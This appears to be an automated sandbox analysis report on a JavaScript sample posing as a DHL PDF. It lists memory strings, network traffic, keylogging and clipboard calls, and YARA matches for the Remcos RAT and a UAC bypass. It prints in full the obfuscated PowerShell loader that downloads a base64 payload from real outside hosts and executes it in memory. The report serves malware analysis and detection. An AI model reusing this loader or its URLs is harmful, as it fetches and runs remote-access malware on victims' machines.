          Source: powershell.exe, 00000002.00000002.2452741154.0000016F102FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3525134792.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
          Source: MSBuild.exe, 00000008.00000002.3527390495.0000000001208000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpn.net/son.gpD
          Source: powershell.exe, 00000002.00000002.2452741154.0000016F10072000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000002.00000002.2434026127.0000016F00222000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000002.00000002.2434026127.0000016F00001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000002.00000002.2434026127.0000016F01D63000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://stakloram.rs
          Source: powershell.exe, 00000002.00000002.2434026127.0000016F00222000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000002.00000002.2500458772.0000016F7E011000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://30.f
          Source: powershell.exe, 00000002.00000002.2434026127.0000016F00222000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://3005.filemail.com
          Source: wscript.exe, 00000001.00000003.2295498528.000002309E457000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2296718606.000002309E45A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2296206892.000002309E457000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRvia
          Source: powershell.exe, 00000002.00000002.2434026127.0000016F0052D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2434026127.0000016F00222000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS
          Source: powershell.exe, 00000002.00000002.2434026127.0000016F00001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
          Source: wscript.exe, 00000001.00000003.2298685914.000002309F0FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298609114.000002309E420000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2301232692.000002309E7B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298976054.000002309E428000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://analytics.paste.ee
          Source: wscript.exe, 00000001.00000003.2298685914.000002309F0FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298609114.000002309E420000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2301232692.000002309E7B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298976054.000002309E428000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://analytics.paste.ee;
          Source: wscript.exe, 00000001.00000002.2305119705.000002309E429000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2300279826.000002309F0FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.2305940898.000002309F0FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298685914.000002309F0FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298609114.000002309E420000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2301232692.000002309E7B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298976054.000002309E428000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com
          Source: wscript.exe, 00000001.00000003.2298685914.000002309F0FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298609114.000002309E420000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2301232692.000002309E7B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298976054.000002309E428000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com;
          Source: powershell.exe, 00000002.00000002.2452741154.0000016F10072000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000002.00000002.2452741154.0000016F10072000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000002.00000002.2452741154.0000016F10072000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
          Source: wscript.exe, 00000001.00000003.2298685914.000002309F0FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298609114.000002309E420000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2301232692.000002309E7B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298976054.000002309E428000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com
          Source: wscript.exe, 00000001.00000003.2298685914.000002309F0FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298609114.000002309E420000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2301232692.000002309E7B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298976054.000002309E428000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fonts.gstatic.com;
          Source: powershell.exe, 00000002.00000002.2434026127.0000016F00222000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2502322189.0000016F7E3F0000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: https://github.com/dahall/taskscheduler
          Source: wscript.exe, 00000001.00000002.2305799629.000002309F09A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
          Source: powershell.exe, 00000002.00000002.2452741154.0000016F10072000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
          Source: wscript.exe, 00000001.00000002.2305799629.000002309F09A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://paste.ee/
          Source: wscript.exe, 00000001.00000002.2303704431.000002309C578000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://paste.ee/d/FsssIAil
          Source: wscript.exe, 00000001.00000003.2301232692.000002309E7B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://paste.ee/d/FsssIAilDVP
          Source: wscript.exe, 00000001.00000003.2300165261.000002309C576000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2299971448.000002309C56E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.2303704431.000002309C578000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://paste.ee/d/FsssIAill
          Source: wscript.exe, 00000001.00000003.2298685914.000002309F0FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298609114.000002309E420000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2301232692.000002309E7B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298976054.000002309E428000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://secure.gravatar.com
          Source: powershell.exe, 00000002.00000002.2434026127.0000016F003D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2434026127.0000016F01D03000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stakloram.rs
          Source: powershell.exe, 00000002.00000002.2434026127.0000016F003D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2434026127.0000016F01D03000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stakloram.rs/css/nom.txt
          Source: powershell.exe, 00000002.00000002.2434026127.0000016F01D03000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stakloram.rsX
          Source: wscript.exe, 00000001.00000003.2298685914.000002309F0FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298609114.000002309E420000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2301232692.000002309E7B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298976054.000002309E428000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://themes.googleusercontent.com
          Source: wscript.exe, 00000001.00000003.2298685914.000002309F0FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298609114.000002309E420000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2301232692.000002309E7B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298976054.000002309E428000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
          Source: wscript.exe, 00000001.00000003.2298685914.000002309F0FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298609114.000002309E420000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2301232692.000002309E7B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298976054.000002309E428000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com;
          Source: wscript.exe, 00000001.00000003.2298685914.000002309F0FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298609114.000002309E420000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2301232692.000002309E7B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298976054.000002309E428000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
          Source: unknown | HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49717 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49718 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.5:49762 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 193.30.119.105:443 -> 192.168.2.5:49802 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 37.27.124.176:443 -> 192.168.2.5:49837 version: TLS 1.2

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_00409340 SetWindowsHookExA 0000000D,0040932C,00000000 8_2_00409340
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,8_2_0040A65A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,8_2_00414EC1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_00409468 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,8_2_00409468

          E-Banking Fraud

          Source: Yara match | File source: 2.2.powershell.exe.16f1056dd48.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.powershell.exe.16f1056dd48.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.powershell.exe.16f115cf6e8.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000008.00000002.3527390495.0000000001208000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.3525134792.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.2452741154.0000016F102FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6968, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 5600, type: MEMORYSTR

          Spam, unwanted Advertisements and Ransom Demands

          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_0041A76C SystemParametersInfoW,8_2_0041A76C

          System Summary

          Source: 2.2.powershell.exe.16f1056dd48.5.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 2.2.powershell.exe.16f1056dd48.5.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 2.2.powershell.exe.16f1056dd48.5.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
          Source: 8.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 8.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 8.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
          Source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
          Source: 2.2.powershell.exe.16f1056dd48.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 2.2.powershell.exe.16f1056dd48.5.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 2.2.powershell.exe.16f1056dd48.5.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
          Source: 2.2.powershell.exe.16f115cf6e8.6.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 2.2.powershell.exe.16f115cf6e8.6.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
          Source: 00000008.00000002.3525134792.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 00000008.00000002.3525134792.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 00000008.00000002.3525134792.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
          Source: 00000002.00000002.2452741154.0000016F102FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: Process Memory Space: powershell.exe PID: 6968, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: Process Memory Space: powershell.exe PID: 6968, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: Process Memory Space: MSBuild.exe PID: 5600, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: C:\Windows\System32\wscript.exe | COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessaries'))"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process Stats: CPU usage > 49%
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_00414DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress,8_2_00414DB4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: String function: 00402073 appears 51 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: String function: 00432B90 appears 53 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: String function: 00432525 appears 41 times
          Source: DHL RPA GRBP Template.PDF.js | Initial sample: Strings found which are bigger than 50
          Source: 2.2.powershell.exe.16f1056dd48.5.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 2.2.powershell.exe.16f1056dd48.5.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 2.2.powershell.exe.16f1056dd48.5.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 8.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 8.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 8.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 2.2.powershell.exe.16f1056dd48.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 2.2.powershell.exe.16f1056dd48.5.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 2.2.powershell.exe.16f1056dd48.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 2.2.powershell.exe.16f115cf6e8.6.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 2.2.powershell.exe.16f115cf6e8.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 00000008.00000002.3525134792.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 00000008.00000002.3525134792.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 00000008.00000002.3525134792.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
          Source: 00000002.00000002.2452741154.0000016F102FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: Process Memory Space: powershell.exe PID: 6968, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: Process Memory Space: powershell.exe PID: 6968, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
